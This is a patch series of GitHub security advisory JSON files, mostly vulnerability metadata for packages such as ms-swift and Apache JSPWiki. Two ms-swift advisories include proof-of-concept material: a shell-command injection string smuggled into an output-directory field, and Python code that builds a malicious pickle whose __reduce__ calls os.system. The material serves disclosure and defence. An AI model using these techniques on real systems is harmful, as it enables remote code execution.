b/advisories/github-reviewed/2025/07/GHSA-7c78-rm87-5673/GHSA-7c78-rm87-5673.json @@ -0,0 +1,59 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7c78-rm87-5673", + "modified": "2025-07-31T14:04:25Z", + "published": "2025-07-31T14:04:24Z", + "aliases": [], + "summary": "MS SWIFT WEB-UI RCE Vulnerability", + "details": "**I. Detailed Description:** \n\n1. Install ms-swift\n ```\n pip install ms-swift -U\n ```\n\n2. Start web-ui\n ```\n swift web-ui --lang en\n ```\n\n3. After startup, access through browser at [http://localhost:7860/](http://localhost:7860/) to see the launched fine-tuning framework program\n\n4. Fill in necessary parameters\n In the LLM Training interface, fill in required parameters including Model id, Dataset Code. The --output_dir can be filled arbitrarily as it will be modified later through packet capture\n\n5. Click Begin to start training. Capture packets and modify the parameter corresponding to --output_dir\n\n You can see the concatenated command being executed in the terminal where web-ui was started\n\n6. Wait for the program to run (testing shows it requires at least 5 minutes), and you can observe the effect of command execution creating files\n\n**II. Vulnerability Proof:**\n```\n/tmp/xxx'; touch /tmp/inject_success_1; #\n```\n\n**III. Fix Solution:**\n1. The swift.ui.llm_train.llm_train.LLMTrain#train() method should not directly concatenate parameters with commands after receiving commands from the frontend\n2. The swift.ui.llm_train.llm_train.LLMTrain#train_local() method should not use os.system for execution, but should be changed to subprocess.run([cmd, arg1, arg2...]) format\n\n## Author\n\n* Discovered by: [TencentAISec](https://github.com/TencentAISec)\n* Contact: *[security@tencent.com](mailto:security@tencent.com)*", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ms-swift" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.6.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/modelscope/ms-swift/security/advisories/GHSA-7c78-rm87-5673" + }, + { + "type": "WEB", + "url": "https://github.com/modelscope/ms-swift/commit/32f09e9b0a44f19d44210e2b5b47c58ab01740e1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/modelscope/ms-swift" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-117" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T14:04:24Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-r54c-2xmf-2cf3/GHSA-r54c-2xmf-2cf3.json b/advisories/github-reviewed/2025/07/GHSA-r54c-2xmf-2cf3/GHSA-r54c-2xmf-2cf3.json new file mode 100644 index 0000000000000..7475ab0873a1c --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-r54c-2xmf-2cf3/GHSA-r54c-2xmf-2cf3.json @@ -0,0 +1,59 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r54c-2xmf-2cf3", + "modified": "2025-07-31T14:05:13Z", + "published": "2025-07-31T14:05:13Z", + "aliases": [], + "summary": "MS SWIFT Deserialization RCE Vulnerability", + "details": "This appears to be a security vulnerability report describing a remote code execution (RCE) exploit in the ms-swift framework through malicious pickle deserialization in adapter model files. The vulnerability allows arbitrary command execution when loading specially crafted adapter models from ModelScope.\n\nThis occurs when using machine torch version < 2.6.0, while ms-swift accepts torch version >= 2.0\n\n**I. Detailed Description:**\n1. Install ms-swift\n```\npip install ms-swift -U\n```\n\n2. Start web-ui\n```\nswift web-ui --lang en\n```\n\n3. After startup, you can access [http://localhost:7860/](http://localhost:7860/) through your browser to see the launched fine-tuning framework program\n\n4. Upload an adapter model repository (cyjhhh/lora_adapter_4_llama3) on ModelScope, where the lora/adapter_model.bin file is generated through the following code:\n```python\nimport torch, pickle, os\n\nclass MaliciousPayload:\n def __reduce__(self):\n return (os.system, (\"touch /tmp/malicious.txt\",)) # Arbitrary command\n\nmalicious_data = {\n \"v_head.summary.weight\": MaliciousPayload(),\n \"v_head.summary.bias\": torch.randn(10)\n}\n\nif __name__ == \"__main__\":\n with open(\"adapter_model.bin\", \"wb\") as f:\n pickle.dump(malicious_data, f)\n```\n\n5. First training submission: First, fill in the required parameters in the LLM Training interface, including Model id and Dataset Code, and configure the following in the Other params section of Advanced settings\n\n6. Click Begin to submit. You can see the backend command running as follows\n\n7. By reading the ms-swift source code, swift.llm.model.utils#safe_snapshot_download() and modelscope.hub.utils.utils#get_cache_dir(), we can see that adapters are downloaded locally to the path ~/.cache/modelscope. Therefore, the complete local path for the specified remote adapters after download is:\n```\n~/.cache/modelscope/hub/models/cyjhhh/lora_adapter_4_llama3\n```\nWait for the first submission program until the adapters download is complete, then you can click \"kill running task\" on the page to terminate the first training\n\n8. Second training submission, configure the page parameters as follows\n\nClick submit to see the backend command running as follows\n\n9. After waiting for a while, you can see that torch.load() loaded the malicious adapter_model.bin file and successfully executed the command. Related execution information can also be seen in the log file corresponding to --logging_dir\n\n10. Note (Prerequisites)\nRequires machine torch version < 2.6.0, while ms-swift accepts torch version >= 2.0\n\n**II. Vulnerability Proof:**\n1. Remote downloaded adapter malicious model: [[lora_adapter_4_llama3](https://www.modelscope.cn/models/cyjhhh/lora_adapter_4_llama3/files)](https://www.modelscope.cn/models/cyjhhh/lora_adapter_4_llama3/files)\n2. For the second training submission, it's recommended to follow the parameters shown in the screenshots above for reproduction, as it will validate the target modules specified in the base model and adapter config. If they don't match, the program will terminate early. It's also recommended to select the same dataset content as shown in the screenshots\n3. This report only reproduces RCE for one entry point (single path). In reality, there are more than one path in the code that can cause deserialization RCE\n\n**III. Fix Solution:**\n```\nSWIFT has disabled torch.load operations from 3.7 or later.\n```\n\n## Author\n\n* Discovered by: [TencentAISec](https://github.com/TencentAISec)\n* Contact: *[security@tencent.com](mailto:security@tencent.com)*", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ms-swift" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.6.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/modelscope/ms-swift/security/advisories/GHSA-r54c-2xmf-2cf3" + }, + { + "type": "WEB", + "url": "https://github.com/modelscope/ms-swift/commit/cc47463bcd25a8720437cf945130f43052eec5e4" + }, + { + "type": "PACKAGE", + "url": "https://github.com/modelscope/ms-swift" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T14:05:13Z", + "nvd_published_at": null + } +} \ No newline at end of file From 6732d697e73bd95aafe59d154ef6d9cfa6ff5284 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 14:13:17 +0000 Subject: [PATCH 276/323] Publish Advisories GHSA-72ww-4rcw-mc62 GHSA-rrff-chj9-w4c7 GHSA-72ww-4rcw-mc62 GHSA-rrff-chj9-w4c7 --- .../GHSA-72ww-4rcw-mc62.json | 61 ++++++++++++ .../GHSA-rrff-chj9-w4c7.json | 92 +++++++++++++++++++ .../GHSA-72ww-4rcw-mc62.json | 31 ------- .../GHSA-rrff-chj9-w4c7.json | 31 ------- 4 files changed, 153 insertions(+), 62 deletions(-) create mode 100644 advisories/github-reviewed/2025/07/GHSA-72ww-4rcw-mc62/GHSA-72ww-4rcw-mc62.json create mode 100644 advisories/github-reviewed/2025/07/GHSA-rrff-chj9-w4c7/GHSA-rrff-chj9-w4c7.json delete mode 100644 advisories/unreviewed/2025/07/GHSA-72ww-4rcw-mc62/GHSA-72ww-4rcw-mc62.json delete mode 100644 advisories/unreviewed/2025/07/GHSA-rrff-chj9-w4c7/GHSA-rrff-chj9-w4c7.json diff --git a/advisories/github-reviewed/2025/07/GHSA-72ww-4rcw-mc62/GHSA-72ww-4rcw-mc62.json b/advisories/github-reviewed/2025/07/GHSA-72ww-4rcw-mc62/GHSA-72ww-4rcw-mc62.json new file mode 100644 index 0000000000000..5c5e495349494 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-72ww-4rcw-mc62/GHSA-72ww-4rcw-mc62.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-72ww-4rcw-mc62", + "modified": "2025-07-31T14:11:15Z", + "published": "2025-07-31T09:32:49Z", + "aliases": [ + "CVE-2025-24854" + ], + "summary": "Apache JSPWiki Cross-Site Scripting (XSS) Vulnerability in the Image Plugin", + "details": "A carefully crafted request using the Image plugin could trigger an XSS vulnerability on Apache JSPWiki, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.\n\nApache JSPWiki users should upgrade to 2.12.3 or later.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.jspwiki:jspwiki-main" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.12.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24854" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/jspwiki" + }, + { + "type": "WEB", + "url": "https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2025-24854" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T14:11:15Z", + "nvd_published_at": "2025-07-31T09:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-rrff-chj9-w4c7/GHSA-rrff-chj9-w4c7.json b/advisories/github-reviewed/2025/07/GHSA-rrff-chj9-w4c7/GHSA-rrff-chj9-w4c7.json new file mode 100644 index 0000000000000..95ccf9a7745ab --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-rrff-chj9-w4c7/GHSA-rrff-chj9-w4c7.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrff-chj9-w4c7", + "modified": "2025-07-31T14:11:06Z", + "published": "2025-07-31T09:32:49Z", + "aliases": [ + "CVE-2025-24853" + ], + "summary": "Apache JSPWiki Cross-Site Scripting (XSS) Vulnerability via Header Link Rendering", + "details": "A carefully crafted request when creating a header link using the wiki markup syntax, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.\n\nFurther research by the JSPWiki team showed that the markdown parser allowed this kind of attack too.\n\nApache JSPWiki users should upgrade to 2.12.3 or later.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.jspwiki:jspwiki-main" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.12.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.jspwiki:jspwiki-markdown" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.12.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24853" + }, + { + "type": "WEB", + "url": "https://github.com/apache/jspwiki/pull/376" + }, + { + "type": "WEB", + "url": "https://github.com/apache/jspwiki/commit/402f9a18b57dd910afba0139e6d3112d54ad650a" + }, + { + "type": "WEB", + "url": "https://github.com/apache/jspwiki/commit/f4089cb6d53223c2c291196ba687753a8b0422cf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/jspwiki" + }, + { + "type": "WEB", + "url": "https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2025-24853" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T14:11:06Z", + "nvd_published_at": "2025-07-31T09:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-72ww-4rcw-mc62/GHSA-72ww-4rcw-mc62.json b/advisories/unreviewed/2025/07/GHSA-72ww-4rcw-mc62/GHSA-72ww-4rcw-mc62.json deleted file mode 100644 index e6497cbe35fb9..0000000000000 --- a/advisories/unreviewed/2025/07/GHSA-72ww-4rcw-mc62/GHSA-72ww-4rcw-mc62.json +++ /dev/null @@ -1,31 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-72ww-4rcw-mc62", - "modified": "2025-07-31T09:32:49Z", - "published": "2025-07-31T09:32:49Z", - "aliases": [ - "CVE-2025-24854" - ], - "details": "A carefully crafted request using the Image plugin could trigger an XSS \nvulnerability on Apache JSPWiki, which could allow the attacker to \nexecute javascript in the victim's browser and get some sensitive \ninformation about the victim.\n\n\n\n\n\nApache JSPWiki users should upgrade to 2.12.3 or later.", - "severity": [], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24854" - }, - { - "type": "WEB", - "url": "https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2025-24854" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2025-07-31T09:15:27Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rrff-chj9-w4c7/GHSA-rrff-chj9-w4c7.json b/advisories/unreviewed/2025/07/GHSA-rrff-chj9-w4c7/GHSA-rrff-chj9-w4c7.json deleted file mode 100644 index cfa7262521013..0000000000000 --- a/advisories/unreviewed/2025/07/GHSA-rrff-chj9-w4c7/GHSA-rrff-chj9-w4c7.json +++ /dev/null @@ -1,31 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-rrff-chj9-w4c7", - "modified": "2025-07-31T09:32:49Z", - "published": "2025-07-31T09:32:49Z", - "aliases": [ - "CVE-2025-24853" - ], - "details": "A carefully crafted request when creating a header link using the \nwiki markup syntax, which could allow the attacker to execute javascript\n in the victim's browser and get some sensitive information about the \nvictim.\n\n\n\nFurther research by the JSPWiki team showed that the markdown parser allowed this kind of attack too.\n\nApache JSPWiki users should upgrade to 2.12.3 or later.", - "severity": [], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24853" - }, - { - "type": "WEB", - "url": "https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2025-24853" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2025-07-31T09:15:26Z" - } -} \ No newline at end of file From 63e78d3c21c0ab25f5d30a2a66ef4f1b3c63dbbe Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 14:23:52 +0000 Subject: [PATCH 277/323] Publish GHSA-rhrv-645h-fjfh --- .../GHSA-rhrv-645h-fjfh.json | 25 ++++--------------- 1 file changed, 5 insertions(+), 20 deletions(-) diff --git a/advisories/github-reviewed/2023/09/GHSA-rhrv-645h-fjfh/GHSA-rhrv-645h-fjfh.json b/advisories/github-reviewed/2023/09/GHSA-rhrv-645h-fjfh/GHSA-rhrv-645h-fjfh.json index a8be5b52d518f..4bfffac89aec3 100644 --- a/advisories/github-reviewed/2023/09/GHSA-rhrv-645h-fjfh/GHSA-rhrv-645h-fjfh.json +++ b/advisories/github-reviewed/2023/09/GHSA-rhrv-645h-fjfh/GHSA-rhrv-645h-fjfh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rhrv-645h-fjfh", - "modified": "2025-02-13T19:15:11Z", + "modified": "2025-07-31T14:22:32Z", "published": "2023-09-29T18:30:22Z", "aliases": [ "CVE-2023-39410" @@ -33,25 +33,6 @@ ] } ] - }, - { - "package": { - "ecosystem": "PyPI", - "name": "avro" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.11.3" - } - ] - } - ] } ], "references": [ @@ -71,6 +52,10 @@ "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/avro/PYSEC-2023-188.yaml" }, + { + "type": "WEB", + "url": "https://issues.apache.org/jira/browse/AVRO-3819" + }, { "type": "WEB", "url": "https://lists.apache.org/thread/q142wj99cwdd0jo5lvdoxzoymlqyjdds" From dca14cfecfc234e6ebf77f12a6c00d53c2890a01 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 15:37:22 +0000 Subject: [PATCH 278/323] Advisory Database Sync --- .../GHSA-4786-jhx6-3pjr.json | 9 ++- .../GHSA-9prg-97hx-vjc4.json | 9 ++- .../GHSA-4gh5-5c2x-4jc5.json | 2 +- .../GHSA-qvmm-8p36-5w5c.json | 5 +- .../GHSA-rm76-63g8-g9g3.json | 2 +- .../GHSA-wg77-mr52-g6pm.json | 2 +- .../GHSA-xqw2-8hr2-gw5r.json | 2 +- .../GHSA-2ff6-7rc2-25pr.json | 52 +++++++++++++++++ .../GHSA-3w97-v426-7jw9.json | 52 +++++++++++++++++ .../GHSA-4ww9-x4qj-x6qm.json | 48 ++++++++++++++++ .../GHSA-55x8-7jw5-crjw.json | 56 +++++++++++++++++++ .../GHSA-5f4x-mf64-8g2r.json | 4 +- .../GHSA-6r87-23pq-fxxg.json | 48 ++++++++++++++++ .../GHSA-6vjc-2rp5-c2hr.json | 33 +++++++++++ .../GHSA-7x25-h6x3-94h7.json | 56 +++++++++++++++++++ .../GHSA-86jp-9w2g-x862.json | 48 ++++++++++++++++ .../GHSA-88g5-2w2f-r74m.json | 56 +++++++++++++++++++ .../GHSA-99x8-h6hx-3fg9.json | 52 +++++++++++++++++ .../GHSA-9qm3-6qrr-c76m.json | 48 ++++++++++++++++ .../GHSA-9whg-3jfv-8hgp.json | 44 +++++++++++++++ .../GHSA-c8cm-6cj9-946w.json | 44 +++++++++++++++ .../GHSA-cmjc-2g23-9m8c.json | 33 +++++++++++ .../GHSA-ff3c-wfr9-cj43.json | 52 +++++++++++++++++ .../GHSA-g2h4-mw8p-v523.json | 52 +++++++++++++++++ .../GHSA-gcm8-8cp3-3x4h.json | 33 +++++++++++ .../GHSA-gm48-jxxv-q9v4.json | 48 ++++++++++++++++ .../GHSA-gww2-cgc8-8xg9.json | 48 ++++++++++++++++ .../GHSA-hc9q-xqxq-qjr5.json | 37 ++++++++++++ .../GHSA-j98h-m6px-h428.json | 48 ++++++++++++++++ .../GHSA-jgfv-5w6w-r347.json | 33 +++++++++++ .../GHSA-p82v-f8g6-gh2j.json | 4 +- .../GHSA-pf4h-wcfc-95m7.json | 44 +++++++++++++++ .../GHSA-pgqf-r37p-r3hr.json | 44 +++++++++++++++ .../GHSA-pp44-53wg-rwwx.json | 33 +++++++++++ .../GHSA-q65g-898q-8jpw.json | 52 +++++++++++++++++ .../GHSA-qgmq-rhmw-xw3r.json | 40 +++++++++++++ .../GHSA-r6rg-5pm3-f7mf.json | 4 +- .../GHSA-v78w-vpxh-p52w.json | 33 +++++++++++ .../GHSA-v9m4-r43p-9696.json | 44 +++++++++++++++ .../GHSA-wrg8-r7q6-v974.json | 4 +- .../GHSA-wwvj-rx6h-pgx7.json | 48 ++++++++++++++++ 41 files changed, 1392 insertions(+), 14 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-2ff6-7rc2-25pr/GHSA-2ff6-7rc2-25pr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-3w97-v426-7jw9/GHSA-3w97-v426-7jw9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4ww9-x4qj-x6qm/GHSA-4ww9-x4qj-x6qm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-55x8-7jw5-crjw/GHSA-55x8-7jw5-crjw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6r87-23pq-fxxg/GHSA-6r87-23pq-fxxg.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6vjc-2rp5-c2hr/GHSA-6vjc-2rp5-c2hr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-7x25-h6x3-94h7/GHSA-7x25-h6x3-94h7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-86jp-9w2g-x862/GHSA-86jp-9w2g-x862.json create mode 100644 advisories/unreviewed/2025/07/GHSA-88g5-2w2f-r74m/GHSA-88g5-2w2f-r74m.json create mode 100644 advisories/unreviewed/2025/07/GHSA-99x8-h6hx-3fg9/GHSA-99x8-h6hx-3fg9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9whg-3jfv-8hgp/GHSA-9whg-3jfv-8hgp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-c8cm-6cj9-946w/GHSA-c8cm-6cj9-946w.json create mode 100644 advisories/unreviewed/2025/07/GHSA-cmjc-2g23-9m8c/GHSA-cmjc-2g23-9m8c.json create mode 100644 advisories/unreviewed/2025/07/GHSA-ff3c-wfr9-cj43/GHSA-ff3c-wfr9-cj43.json create mode 100644 advisories/unreviewed/2025/07/GHSA-g2h4-mw8p-v523/GHSA-g2h4-mw8p-v523.json create mode 100644 advisories/unreviewed/2025/07/GHSA-gcm8-8cp3-3x4h/GHSA-gcm8-8cp3-3x4h.json create mode 100644 advisories/unreviewed/2025/07/GHSA-gm48-jxxv-q9v4/GHSA-gm48-jxxv-q9v4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-gww2-cgc8-8xg9/GHSA-gww2-cgc8-8xg9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hc9q-xqxq-qjr5/GHSA-hc9q-xqxq-qjr5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j98h-m6px-h428/GHSA-j98h-m6px-h428.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jgfv-5w6w-r347/GHSA-jgfv-5w6w-r347.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pf4h-wcfc-95m7/GHSA-pf4h-wcfc-95m7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pgqf-r37p-r3hr/GHSA-pgqf-r37p-r3hr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pp44-53wg-rwwx/GHSA-pp44-53wg-rwwx.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q65g-898q-8jpw/GHSA-q65g-898q-8jpw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qgmq-rhmw-xw3r/GHSA-qgmq-rhmw-xw3r.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v78w-vpxh-p52w/GHSA-v78w-vpxh-p52w.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v9m4-r43p-9696/GHSA-v9m4-r43p-9696.json create mode 100644 advisories/unreviewed/2025/07/GHSA-wwvj-rx6h-pgx7/GHSA-wwvj-rx6h-pgx7.json diff --git a/advisories/unreviewed/2022/05/GHSA-4786-jhx6-3pjr/GHSA-4786-jhx6-3pjr.json b/advisories/unreviewed/2022/05/GHSA-4786-jhx6-3pjr/GHSA-4786-jhx6-3pjr.json index 97164d10751b2..34b0781f45d68 100644 --- a/advisories/unreviewed/2022/05/GHSA-4786-jhx6-3pjr/GHSA-4786-jhx6-3pjr.json +++ b/advisories/unreviewed/2022/05/GHSA-4786-jhx6-3pjr/GHSA-4786-jhx6-3pjr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4786-jhx6-3pjr", - "modified": "2022-05-24T19:05:27Z", + "modified": "2025-07-31T15:35:44Z", "published": "2022-05-24T19:05:27Z", "aliases": [ "CVE-2021-1395" ], "details": "A vulnerability in the web-based management interface of Cisco Unified Intelligence Center could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-9prg-97hx-vjc4/GHSA-9prg-97hx-vjc4.json b/advisories/unreviewed/2022/05/GHSA-9prg-97hx-vjc4/GHSA-9prg-97hx-vjc4.json index 5456ae426f8f0..5d9f4b05aae85 100644 --- a/advisories/unreviewed/2022/05/GHSA-9prg-97hx-vjc4/GHSA-9prg-97hx-vjc4.json +++ b/advisories/unreviewed/2022/05/GHSA-9prg-97hx-vjc4/GHSA-9prg-97hx-vjc4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9prg-97hx-vjc4", - "modified": "2022-05-24T17:46:52Z", + "modified": "2025-07-31T15:35:44Z", "published": "2022-05-24T17:46:52Z", "aliases": [ "CVE-2021-1463" ], "details": "A vulnerability in the web-based management interface of Cisco Unified Intelligence Center Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2025/02/GHSA-4gh5-5c2x-4jc5/GHSA-4gh5-5c2x-4jc5.json b/advisories/unreviewed/2025/02/GHSA-4gh5-5c2x-4jc5/GHSA-4gh5-5c2x-4jc5.json index 42ab98bad79b9..24c5720597835 100644 --- a/advisories/unreviewed/2025/02/GHSA-4gh5-5c2x-4jc5/GHSA-4gh5-5c2x-4jc5.json +++ b/advisories/unreviewed/2025/02/GHSA-4gh5-5c2x-4jc5/GHSA-4gh5-5c2x-4jc5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4gh5-5c2x-4jc5", - "modified": "2025-02-05T18:34:45Z", + "modified": "2025-07-31T15:35:44Z", "published": "2025-02-05T18:34:45Z", "aliases": [ "CVE-2024-56134" diff --git a/advisories/unreviewed/2025/02/GHSA-qvmm-8p36-5w5c/GHSA-qvmm-8p36-5w5c.json b/advisories/unreviewed/2025/02/GHSA-qvmm-8p36-5w5c/GHSA-qvmm-8p36-5w5c.json index bf1b7b0fa7627..abd19d88eac3c 100644 --- a/advisories/unreviewed/2025/02/GHSA-qvmm-8p36-5w5c/GHSA-qvmm-8p36-5w5c.json +++ b/advisories/unreviewed/2025/02/GHSA-qvmm-8p36-5w5c/GHSA-qvmm-8p36-5w5c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qvmm-8p36-5w5c", - "modified": "2025-02-05T18:34:45Z", + "modified": "2025-07-31T15:35:44Z", "published": "2025-02-05T18:34:45Z", "aliases": [ "CVE-2024-56132" @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/02/GHSA-rm76-63g8-g9g3/GHSA-rm76-63g8-g9g3.json b/advisories/unreviewed/2025/02/GHSA-rm76-63g8-g9g3/GHSA-rm76-63g8-g9g3.json index eb4e1bc5d0105..417982dd17c98 100644 --- a/advisories/unreviewed/2025/02/GHSA-rm76-63g8-g9g3/GHSA-rm76-63g8-g9g3.json +++ b/advisories/unreviewed/2025/02/GHSA-rm76-63g8-g9g3/GHSA-rm76-63g8-g9g3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rm76-63g8-g9g3", - "modified": "2025-02-05T18:34:45Z", + "modified": "2025-07-31T15:35:44Z", "published": "2025-02-05T18:34:45Z", "aliases": [ "CVE-2024-56131" diff --git a/advisories/unreviewed/2025/02/GHSA-wg77-mr52-g6pm/GHSA-wg77-mr52-g6pm.json b/advisories/unreviewed/2025/02/GHSA-wg77-mr52-g6pm/GHSA-wg77-mr52-g6pm.json index 074505b49bb32..2098e3ce839b9 100644 --- a/advisories/unreviewed/2025/02/GHSA-wg77-mr52-g6pm/GHSA-wg77-mr52-g6pm.json +++ b/advisories/unreviewed/2025/02/GHSA-wg77-mr52-g6pm/GHSA-wg77-mr52-g6pm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wg77-mr52-g6pm", - "modified": "2025-02-05T18:34:46Z", + "modified": "2025-07-31T15:35:44Z", "published": "2025-02-05T18:34:46Z", "aliases": [ "CVE-2024-56135" diff --git a/advisories/unreviewed/2025/02/GHSA-xqw2-8hr2-gw5r/GHSA-xqw2-8hr2-gw5r.json b/advisories/unreviewed/2025/02/GHSA-xqw2-8hr2-gw5r/GHSA-xqw2-8hr2-gw5r.json index c34d0f41af522..9c2c062fe8fa0 